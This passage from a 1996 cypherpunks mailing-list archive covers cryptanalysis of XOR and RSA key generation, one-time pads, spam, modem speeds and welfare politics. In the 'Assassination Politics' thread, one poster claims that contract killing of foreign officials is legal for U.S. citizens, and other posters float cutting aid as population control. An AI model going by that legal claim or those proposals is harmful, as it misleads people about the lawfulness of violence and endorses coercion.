I read some five newspaper articles on export control/GAK in the last few days. All mentioned as a matter of fact that GAK will be part of lightened export controls. None questioned the connection between domestic GAK and foreign exports. The worst of these articles, in the Sunday SF Chronicle, mentioned as the only defenders of non-GAK encryption hackers by the name of "Black Knight", etc. who were quoted as having no explanation for the dichotomy between "information wants to be free" and "I don't want the Feds to read my email".

It is a done deal,

--Lucky, who told you this three years ago.

From bdurham at metronet.com Tue Sep 17 01:56:29 1996
From: bdurham at metronet.com (Brian Durham)
Date: Tue, 17 Sep 1996 16:56:29 +0800
Subject: Redundancy in XOR encryption
In-Reply-To: <842896374.27768.0@fatmans.demon.co.uk>
Message-ID: <323E2C6A.7423@metronet.com>

paul at fatmans.demon.co.uk wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> I have a question I hope someone here might be able to answer:
>
> As the method of cryptanalysis of XOR (Ie. index of coincidence)
> relies on redundancy in the plaintext, would the following be strong:
>
> Compress P to get perfect compression (ie. 0 redundancy)
> Encrypt F (the compressed text) using a repeated key XOR
>
> of course this is all rather theoretical as there is no such thing as
> perfect compression, but I just thought it might be interesting to
> see if this is indeed strong, superficially it appears so to me...
>

Paul: I think that if the cryptanalyst knows that F has zero redundancy that he can run searches from 0 to n bits for the key and have the computer flag solutions that have zero redundancy.
I also think that a perfectly compressed file would have a relative entropy value close to one also, hence the computer could flag possibles that have both characteristics. Hence, instead of searching for plaintext by counting coincidences, we are searching the decrypts for solutions that have zero redundancy and a relative entropy value close to one. How many solutions will have both these qualities? I don't know. But if the compression method is known, brute force will be tried, and only having to try to decompress (read) data that has the resultant characteristics of compressed information will speed things up by quite a bit.

Others may disagree with my thought-experiment and my approach, but I think this is quite possible ... even to persons with limited computing resources.

Brian Durham
bdurham at metronet.com

From hallam at ai.mit.edu Tue Sep 17 01:57:39 1996
From: hallam at ai.mit.edu (hallam at ai.mit.edu)
Date: Tue, 17 Sep 1996 16:57:39 +0800
Subject: Spam blacklist project
In-Reply-To: <199609170200.WAA13918@osceola.gate.net>
Message-ID: <9609170603.AA03193@etna.ai.mit.edu>

Well if some people find it amazing that there are people out there who agree with the 98.8% of people who did not vote Libertarian at the last election then so be it.

It might have occurred to you but if an industry gets its act together and provides itself with a fig leaf it gets regulated a lot less than if it says "up yours we don't believe you have the right".

If it wasn't for knowing how inane people are on the net I would think the Hi Spammer to be an agent provocateur. Sending spam with a gratuitous "you can't stop me" message attached is an invitation in itself. The terrorists helpgroup stuff at his site hardly helps his cause either. All in all he looks like a custom made provocation to show to some senator like Exon and get a crackpot bill passed PDQ.
Are people sure the guy isn't a front being run by some disgruntled tele-marketing or junk mail house that feels it is in danger of losing business?

Phill

From frantz at netcom.com Tue Sep 17 02:01:11 1996
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 17 Sep 1996 17:01:11 +0800
Subject: Gaining trust in OCO crypto code
Message-ID: <199609170523.WAA20766@netcom8.netcom.com>

I agree with Norm's points.

At 6:59 PM 9/16/96 -0700, Norman Hardy wrote:
>At 3:06 PM 9/12/96, Bill Frantz wrote:
>....
>>(2) Key generation. There are published ways to encode an RSA secret key
>>in the corresponding RSA public key. A key generation algorithm which only
>>uses 32 bits of the random number would be hard to detect, but easy to
>>break by one who knew its secret. You have to be able to examine in detail
>>how keys are generated.
>
>Actually if you generate 100,000 RSA keys with the algorithm the birthday
>effect says that
>you will have some collisions. Of course even 100,000 key generations takes
>a long time.

This statement was not as clear as I wish I had been. The trap door in RSA key generation is sufficient to require careful examination of the source for any RSA key (unless you can take the out Norm suggests as):

>If random number generation is specified not to be integral to RSA key
>generation, then two or more untrusted programs, from mutually hostile
>sources, can generate your RSA key if they yield the same output from the
>same input. In paranoia situations I would rather trust my keyboard random
>than an algorithm chosen by my enemy.

When I started discussing using only 32 bits of the random number, I was thinking of random session keys such as PGP generates for its IDEA cypher. I agree you could detect a small number of bits being used to generate these keys by a birthday attack. However, most systems make sure these keys are never revealed outside the system (to preserve the secrecy of the messages). It is not easy to do a birthday audit of e.g.
PGP session keys.

-------------------------------------------------------------------------
Bill Frantz          | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506        | and cave with duct tape."  | 16345 Englewood Ave.
frantz at netcom.com | - Marianne Russo           | Los Gatos, CA 95032, USA

From tcmay at got.net Tue Sep 17 02:10:51 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 17:10:51 +0800
Subject: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID:

At 2:06 AM 9/17/96, The Deviant wrote:

>Not to mention, the basic flaw of OTP.. if you have the only copy of the
>key, and the key is non-repetitive, how do you send the key to another
>person without being just as insecure as not encrypting it in the first
>place... almost any OTP claims are gonna be snake oil.

Not quite. Many cryptographic messages have a *time value*. The canonical example is "Attack at dawn." A one-time pad carried by a unit out onto the battlefield is eminently valuable for receiving such time-critical messages.

Many other examples abound: embassies receiving instructions from the home country, travelling businessmen exchanging messages with the office, Air Force One receiving encrypted transmissions from NORAD, and so on.

This is why OTPs are still in use by the military, embassies, etc.

Granted, asymmetric key systems have various advantages, discussed here all the time, but to say almost any OTP claims are snake oil is untrue.

(Many claims about OTPs _are_ of course snake oil, but usually in that they are not true OTPs in the Shannon sense.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From unicorn at schloss.li Tue Sep 17 02:15:56 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 17:15:56 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant). In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Steve Schear wrote: > >On Mon, 16 Sep 1996 19:58:25 -0400, Black Unicorn wrote: > > > >Remember the original purpose of social security. A government fund which > >was self sustaining because it only gave out what was put in and gained by > >investment. > > Not quite. You'll remember that SS was pitched to the masses as such > during the Great Depression, but its true purpose was to allow older > workers to quickly retire and make room for the largely unemployed men in > their prime, family raising, years. It became this, yes, but the original concept (at least according to the legislative history) was as I represent above. > > > > >> A social safety net is simply a form of health and life > >> insurance. Statistical arbitrage if you will. > > > >Yes, but not for the reasons you would cite. Social safety nets prevent > >rioting by the lower classes, revolution and general civil disorder > >because they appease the masses. Indeed this is a form of health and life > >insureance for the middle and upper classes. > > No doubt. See my previous comment. [...] > >Spreading the risk, by itself, does NOT reduce cost. You must properly > >PRICE risk. > > > >This is the distinction between insurance and welfare. > > Right on! I forgot to mention that welfare and free health insurance plans do not SPREAD risk either. 
They concentrate the risk of the entitlement eligable population including those able to pay down onto the smaller group of only those who earn an income substantial enough to contribute. Those who can pay in are effectively burdening the risk of those who cannot as well as themselves, instead of just themselves. > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 > --------------------------------------------------------------------- > Snoop Daty Data | Internet: azur at netcom.com > Grinder | Voice: 1-702-655-2877 > Sacred Cow Meat Co. | Fax: 1-702-658-2673 > 7075 W. Gowan Road, #2148 | > Las Vegas, NV 89129 | > --------------------------------------------------------------------- > > Just say NO to perscription DRUGS. > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From rp at rpini.com Tue Sep 17 02:27:37 1996 From: rp at rpini.com (Remo Pini) Date: Tue, 17 Sep 1996 17:27:37 +0800 Subject: 56 kbps modems Message-ID: <9609170612.AA21839@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Tue Sep 17 08:09:26 1996 > > > > On Mon, 16 Sep 1996, Jay Gairson wrote: > > > Speaking of ISDN, how many people, can afford to have a personal ISDN > > line in there house? And then afford to connect to something/someone > > else on a next to permanent basis monthly? > > No problem here. My ISDN bill is a small fraction of my regular phone > bill. > In Switzerland you pay 25 CHF/month for a normal phoneline and 50 CHF/month for an ISDN line (but you get two channels), so basically here it doesn't matter, which technologie you choose. 
(BTW, usage charge - by the seconds - is the same for both) :) Remo Pini - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv -----END PGP SIGNATURE----- From Wyntermute at worldnet.att.net Tue Sep 17 02:37:55 1996 From: Wyntermute at worldnet.att.net (Justin Card) Date: Tue, 17 Sep 1996 17:37:55 +0800 Subject: Diffie Hellman - logs in Galois fields In-Reply-To: <842896368.27767.0@fatmans.demon.co.uk> Message-ID: <323CDB46.1632@worldnet.att.net> paul at fatmans.demon.co.uk wrote: > > Hi all, > > A question for the matematicians out there: > > I am looking at the Diffie Hellman public key exchange protocol and > am trying to find out why it is computationally hard to take logs in > a finite (Galois) field. > > My maths tutor has told me a bit about the construction of Galois > fields (If I`m correct the construction is Z mod N, N some integer, > then a transformation F(x) on the residue classes already in the > field) I know also the definition is that there are P**k elements, p > a prime. > > My questions are as follows: > > 1. How can a field be finite, as by definition it has to be closed > under addition, subtraction, multiplication and division???? (sorry > if this one is a bit of a no brainer, maybe the definition is > different but I can`t seem to see how) I'll have to let somebody else answer this one, since I am really not sure. > 2. Why is taking logs in a finite field computationally hard?
- Me > and Alec (My maths tutor at college) guessed that it is because > exponentiation and logs are each others inverse functions, and > somehow this becomes a one way function in a finite field. As far as anybody knows, you're right, exponentiation is a one way function in a prime field. However, there are some things to be said. If you're using a fixed g and N, or repeat both for too many key exchanges, if anybody logged them, it becomes a more exciting target, since the hard part of the algorithms need be completed only once. Then taking separate logs with the same g and N is easy. > 3. Are the Galois fields used in Diffie Hellman specially constructed > in any way or are they just normal GF???? The field used in DH is just a standard Galois Field mod some large prime. -- Wyntermute From nobody at replay.com Tue Sep 17 02:44:38 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 17:44:38 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609170532.HAA03260@basement.replay.com> Black Unicorn wrote: > > > The thing about _traditional_ charity, of the religious or community sort, > > > was that it was not treated as an "entitlement," as something the > > > resentful masses could "demand" as part of their "human rights." > > > > There's no substantial difference between their resentful whining about > > their rights > > Such as the "right" to health insurance, the "right" to free checks for > sitting on one's chair, the "right" to be treated preferentially as > equally qualified non-minorities applying to the same job, the "right" to > housing, the "right" to free education, the "right" to be paid three times > what your labor is worth in the lowest bracket jobs. I wasn't surprised when Attilla flogged a cartoon liberal in responding to me, but I'm quite surprised you have. I didn't produce or defend a litany of "rights," I pointed out that Tim is resentful and whines. 
> > and your resentful whining about your rights > > The right to personal property. Malapropos. > Beginning to get the picture? I've had it all along. > All of the former were created in the last 60 years out of whole cloth > more as "revolution insurance" than anything else. They are rights > because someone said they were, not because they are well or logically > grounded. Absolutely. > > - except maybe that you whine more. > > I should hope he does. Why? From craigw at dg.ce.com.au Tue Sep 17 02:52:49 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 17:52:49 +0800 Subject: 56 kbps modems Message-ID: <199609170629.QAA10129@mac.ce.com.au> > Also note there's no mention of the hype-writer's old friend, > compression. But then if you are doing the compressed rate 56k is not that high. There are 28.8k modems that (in theory) do 336k including compression, so 56k would be redundant. Most current modems specify they will compress to 115k, whether they ever get close to this is unlikely Craig ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you) From rp at rpini.com Tue Sep 17 02:54:20 1996 From: rp at rpini.com (Remo Pini) Date: Tue, 17 Sep 1996 17:54:20 +0800 Subject: 56 kbps modems Message-ID: <9609170622.AA22206@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: erp at digiforest.com, cypherpunks at toad.com Date: Tue Sep 17 08:20:07 1996 Argh, criticism!!!!! :-0 > > 3. NO transmission over a standard phoneline can have more than 3100 > > baud, because the frequency of anything transmitted over that line is > > band limited to 300hz - 3400hz. (If you have ISDN it's not relevant > > anyway, since you are fixed with 8000hz or 64000 bps->in europe :), > > 56000 bps in usa) > > Personally, by saying that no transmission on a standard phoneline can > have more than 3100 baud, is a statement saying that technology and > science, shall never advance, to a point where things are possible. > If you remember right, just 10 or so years ago, we stated that 2400 baud > was the highest possible baud, and we would never go over. My modem, > running on a standard phone line, is a 28.8 USRobotics modem, with > the software, and hardware upgrades to a 3400 baud, I get on an average > day anywhere from 3500 to 3600 baud for send/receive. On a bad day, I > only get 3100 to 3200. SO I would say, that my phone lines, are cleaner > than most eh? And Yes, I am in the US. > Speaking of ISDN, how many people, can afford to have a personal ISDN > line in there house? And then afford to connect to something/someone > else on a next to permanent basis monthly? Well, if your modems says to "hell with the switch", you can do a lot of things with frequencies. And since the filters in the switch are not that accurate, you *might* get away with 3400 hz, which I doubt. 
Now if your phonecompany for what reason ever supports more bandwidth, thats good for you, but try to get your 3600 baud = 3600 hz modem to be accepted by the FCC will pose a problem, since it states in the regulations, that a modem has to stick to the 300-3400 hz band limits. > > 4. Most modern transmission schemes work with multiple bits per baud. > > I.e. you transmit 10 bits in one baud if you have a 31000 bps modem. > > the only limitation in transmission speed is the amount of binary > > values you can pack into one baud. that on the other hand is limited by > > the S/N (signal to noise) ratio of your line. If you have a noise of > > 0.9%, you can't use more than 100 steps or you have ambiguous signals. > > since people talk about 56000 bps modems (we tried 34000 modems here > > and they couldn't produce more than 28800 on a very good connection) > > that would mean, that you have to transmit 18 bits = 262144 (!) > > distinguishable signal forms per baud. > What about new ways of splitting the steps and baud more so that it > shows less at a higher level.... Just a question.. Ahh well, I'm > getting a page so I shall finish this now... Answer appreciated.. Huh? 
- ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv -----END PGP SIGNATURE----- From unicorn at schloss.li Tue Sep 17 03:01:09 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 18:01:09 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: Message-ID: On Mon, 16 Sep 1996, Steve Schear wrote: > Someone wrote: > >The problem is that assasination rarely leads to the installation of > >a government that is any better. In most cases it gets worse. [...] > We've all heard these arguments, but are they true? Who says so, and how > can they be certain? Jim's suggestion has never, to my knowledge, been > tried on a consistant, large, scale. When all conventional alternatives > have been tried and fail, what have we or the starving children got to > lose? I think "Lord of the Flies" answers this question quite well. > Is it legal for citizens of the U.S. to engage in contract killing of > foreign military, politations, etc? How about U.S. or foreign non-profits? As to the first, yes. (There are several anti-mercenary statutes on the books) As to the second, I don't understand the question. [...] > -- Steve -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tcmay at got.net Tue Sep 17 03:24:58 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 18:24:58 +0800 Subject: Forwared message from Pres.
of juno.com Message-ID: At 12:55 AM 9/17/96, Rabid Wombat wrote: >---------- Forwarded message ---------- >Date: Fri, 13 Sep 1996 15:25:58 -0400 >From: Charles Ardai >To: Rabid Wombat >Subject: Annoying spam incident(s) ^^^^ >> Complaints about spamming and cross-posting probably won't get you far, ^^^^^^^^ >A couple of clarifications: Juno has never sent a single piece of spam and, ^^^^ ... And so on, with the word "spam" being used frequently throughout the exchange. Now, correct me if I'm wrong, but I don't recall seeing _any_ "spam" from the account holders at Juno. What I _do_ recall is one or more young kids signed up to our list and then began engaging in posting to the list various boring comments about their interests, their "warez," and so on. Stupid comments are not necessarily (or even usually) spam. When we start calling stupid postings "spam" and complaining to sysadmins about "spamming" by a user, we have seriously devalued any use the term might have once had. This applies whether the stupid posts are from "talker" or from _me_. We have an open mailing list, with anyone able to subscribe via majordomo. This means we'll get inexperienced users, flamers, and, yes, even true commercial spammers who use the open-reflector nature of the list to post their ads. (By the way, when various political organizations, e.g., EPIC, the Libertarian Party, EFF, VTW, etc., use this open-posting feature, is this also to be called "spamming"? Why is an alert to dozens of mailing lists and newsgroups not spam, while "Buy Wheaties" _is_ spam? The answer is that spam is in the eye of the beholder, and the law should not attempt to decide which "unrequested messages" are OK and which are not.) 
Some suggestions: -- if people want a closed list, use a version of list software that only allows members to post -- if people want "levels" of expertise involved, a la "29th Level Cypherpunk," this is not the place and time to try to implement this -- use filters, e.g., procmail, Eudora, whatever -- don't refer to unwanted posts as "spam," as this invites talk of applying laws about spam -- as always, use technology and related tools (filters, reputations) whenever possible instead of laws and the threat of laws The sooner we move to a system where people make positive decisions about which messages to accept and which not to, the better. This is a technological effort--seeking to influence the direction mail takes--worthy of some serious thinking, in my view. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Tue Sep 17 04:14:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 19:14:26 +0800 Subject: 56 kbps modems Message-ID: <199609170721.AAA22844@dfw-ix12.ix.netcom.com> >On Mon, 16 Sep 1996, Jay Gairson wrote: >> Speaking of ISDN, how many people, can afford to have a personal ISDN >> line in there house? And then afford to connect to something/someone >> else on a next to permanent basis monthly? It's Phone Company Dependent. Here in Pac Bell territory, an ISDN phone line costs about 2.5 analog phone lines, and gets you two phone lines plus some signalling. Connection costs are free at night, and 1 cent/minute daytime. 
That may change - the phone company is appalled that all these computer people interpret the phrase "free at night" as meaning "it's _free_ at night", so their holding time predictions were bogus :-) Night is defined as 7pm-7am for ISDN. ISDN-equipped ISPs start at about $30/month; don't know if that's unlimited connect time or not. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Tue Sep 17 04:36:27 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 19:36:27 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609170722.AAA22919@dfw-ix12.ix.netcom.com> At 10:06 PM 9/16/96 -0400, The Deviant wrote: >Not to mention, the basic flaw of OTP.. if you have the only copy of the >key, and the key is non-repetitive, how do you send the key to another >person without being just as insecure as not encrypting it in the first >place... almost any OTP claims are gonna be snake oil. The way you send OTPs to people securely is to use couriers with briefcases handcuffed to their arms, or whatever level of physical security you need. The kinds of things software packages can help with are providing a friendly user interface for getting the next N bits out of the pad and trashing them after use, keeping track of where you were in the pad, handling the different pads you use to communicate with different people, driving the robot arm that drops the tape into the shredder, etc. Slightly less trustably, they can be used to help generate a pad by crunching down the data from your hardware random number generators, and perhaps emailing Geiger Counter data to the Safety Department after rounding to the nearest order of magnitude. Somebody else wrote: >> I would also suggest that the generation of OTP 'pads' for users is >> *highly* questionable. Who else is getting a copy of them, assuming they're >> even valid? 
Definitely - that concept loses big time. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From craigw at dg.ce.com.au Tue Sep 17 04:38:06 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 19:38:06 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant Message-ID: <199609170703.RAA21552@mac.ce.com.au> Personally, I paid my way through uni...full fees. I took out a loan when I developed cancer to pay for it (as the health insurance was not finalised for aproval - so they got out of paying). The few months I was unemployed after I left the military because of a confict of interests I earned money by doing whatever I could get (even though I am an engineer I have worked in a petrol station). So why and for what reason sould I have to pay several 10's of thousands each year to support others. I have never taken help from the govenment, I do not feel I should have to pay as well. And what am I paying for...to protect the status quo. I believe that there is more than enough help for ppl available. They just need to get off their butts and work. > > tcmay at got.net (Timothy C. May) wrote: > > >"Saving for a rainy day," whether saving, investing, getting an education > > (while others are out partying), preparing, etc., all takes effort and > > commitment. If those who save and prepare are then told they have to pay > > high taxes to support those who partied....well, the predictable effect > > [...] is _more_ people in agony. When you tell people that a compassionate > > society will meet their basic needs, a predictable fraction of them will choose > > not to work hard and prepare themselves. > > > > Two questions, two observations: > > Do you have health insurance? > > Do you have life insurance? > > Yes, so? > Yes, so? 
Myself also yes,yes > > I have commented on your line of reasoning before and and it still > > seems to me that an important part of the discussion is missed. > > Specifically, that anyone can "save for a rainy day" and still not be > > able to provide for events that can always happen: Heart attack, stroke, > > car accident, pinched nerve that leaves you in excruciating pain and > > unable to work for several years. > > Understand what it is you are saying. > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From stewarts at ix.netcom.com Tue Sep 17 04:43:06 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 17 Sep 1996 19:43:06 +0800 Subject: SPL -- Suspicious Persons List Message-ID: <199609170721.AAA22857@dfw-ix12.ix.netcom.com> At 11:19 AM 9/16/96 -0400, you wrote: >The Tories put an exclusion into the act deliberately to cover the >Ecconomic League. Only record which are kept on computer are covered. >The Ecconomic League deliberately keeps all its records on paper to >avoid the act. .... >This is the same government which used MI5 to monitor the activities of >the peace movement and which used 5000 crack troops to evict 50 elderly >women from land they wanted to turn into a missile base. Whether you >agree or disagree with the policies the methods sound very much like those >of Hoover at the FBI with a strong dose of Nixon thrown in. Yeah. 
The Los Angeles Police Department, and to some extent many police departments that once had "Red Squads" chasing "Communists", doesn't have any records of who's a commie and who's been caught in bed with whom or what or caught stealing what from whom, and very few records of who's been shoving what else up their nose. However, there are a number of cops who have file cabinets in their garages at home, or who these days have personal computers, often with BBSs. And they talk to their friends, and maybe share the material in their file cabinets and PCs. None of the City's business. I've met four gentlemen from the Philadelphia Red Squad - I went out and offered them coffee after they'd spent the day lurking in a car outside an anarchist convention I was at a couple years back. They'd brought their own, and were set for the next couple hours :-) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From craigw at dg.ce.com.au Tue Sep 17 04:46:43 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 19:46:43 +0800 Subject: Spam blacklist project Message-ID: <199609170715.RAA24749@mac.ce.com.au> But all governments are so GOOD and wholesome...how could they EVER do anything that their ppl did not like 100% ;) > Your faith in big government, despite seemingly every bit of evidence > possible to the contrary, astounds me sometimes. Churches, Mosques, etc. > struggle mightily for this kind of thought pattern in believers, yet it > comes to you naturally, in secular life. Truly a marvel, and on _this_ list, > of all places. It has kept me from killfiling you, but I must occasionally > express my awe at the power of faith to literally move mountains. There is a > "regulation" (law) against [murder, selling/growing reefer, selling sexual > services, assault, you name it] yet you'd never deny that these behaviors > still exist, would you? 
Somehow, though, you still seem to manage to think > that spamming slimeballs will just disappear with more regulations. It's > astonishing. > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dthorn at gte.net Tue Sep 17 05:48:30 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 17 Sep 1996 20:48:30 +0800 Subject: "But if it saves just one child." In-Reply-To: <199609160656.AAA23532@InfoWest.COM> Message-ID: <323D617C.79B5@gte.net> attila wrote: > In , on 09/15/96 > at 03:51 PM, tcmay at got.net (Timothy C. May) said: > = .The rallying cry heard so often these days: "But if it saves just > one child." > "...now that we have saved just one child, save another, a boy > and a girl, so they breed,and we can justify our jobs feeding: > "just one more child...." > "...give until you bleed." > = .(Hillary also thinks it takes a village to save the children.) > yeah, a _global_ village with good King Hillary. > welcome to "Logan's Run" (and Fahrenheit 451) I've been looking for a good price on a large Hillary Clinton button for several weeks now. The best I've seen so far was $3 at a booth in the Santa Monica 3rd Street Promenade. Since I want to give the absolute least cash possible to these people (less than none, preferably) I'd just like to know if anyone knows of a better deal. 
From gnu at toad.com Tue Sep 17 05:52:35 1996 From: gnu at toad.com (John Gilmore) Date: Tue, 17 Sep 1996 20:52:35 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building Message-ID: <199609170744.AAA07272@toad.com> When: Friday, September 20, 1996, 11:45AM (hearing starts at Noon) Where: Federal Building, 450 Golden Gate Avenue, San Francisco; Judge Marilyn Hall Patel's courtroom upstairs. (two blocks east of Van Ness Avenue and Golden Gate Avenue, in the Civic Center neighborhood) What: Dan Bernstein's case to declare the export controls unconstitutional will hold a hearing in which the judge will cross-examine both Dan's lawyers and the government's lawyers, to decide whether to strike down the ITAR and AECA as unconstitutional, throw out the case, or do something in between. Who: me, Dan's lawyers, NSA & State & Justice dept lawyers, the press, and as many cypherpunks and friends-of-encryption as will show up. Don't forget your costume! Formal dress is strongly recommended; you're going to court, remember! Why: To see justice in action; to hang out with your friends; to be there while cryptographic history is made; to get your picture in the Feb '97 Wired Japan. PS: Date: Mon, 16 Sep 1996 19:30:29 -0700 (PDT) To: gnu at toad.com Subject: I've got "go ahead" from my editor From: Rika ... I have read about "cypherpunk dress up day" and found it a good oppotunity to let Japanese reader of Wired know about law suit and circumustance of encription exporting, as well as actual activity of cypherpunk people. So far, "cypherpunk" is more like just a image/notion than actual living people to Japanese. If I can take a couple of group pictures after the court, I can develop an article for their Feb '97 issue. I hope it is ok with you and lots of lots of people show up this friday! Rika ... 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 笠原 利香 〒183 東京都府中市白糸台６-13-13 Rika Kasahara POBox 25427, Los Angeles, CA 90025 Voice:+1-310-478-0653 Fax :+1-310-478-0493 From craigw at dg.ce.com.au Tue Sep 17 06:51:27 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 21:51:27 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609170954.TAA23685@mac.ce.com.au> >And this? Mr. Green hardly advocated an authoritarian regime, quite the >contrary, he simply advocated one which refused to hand out money to every >outstretched hand. and the hands are usually those of a foreign government anyway...not the "starving masses". Not only is the money I pay as tax used for funding the country I am in...but also the military in others. > In article , > Lucky Green wrote: > > On Sun, 15 Sep 1996, Dale Thorn wrote: > > > Just a comment: "The world population really should go back to around > > > one billion", etc. And how could we achieve that without severe govt. > > > oppression, one wonders? > > > > Quite simple. End all food and medical aid to developing countries paid > > for with money stolen at gunpoint from our citizens. Or make Norplant > > implants the condition for financial/in kind aid. Both US and > > abroad. > >And this? Mr. Green hardly advocated an authoritarian regime, quite the >contrary, he simply advocated one which refused to hand out money to every >outstretched hand. ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo.
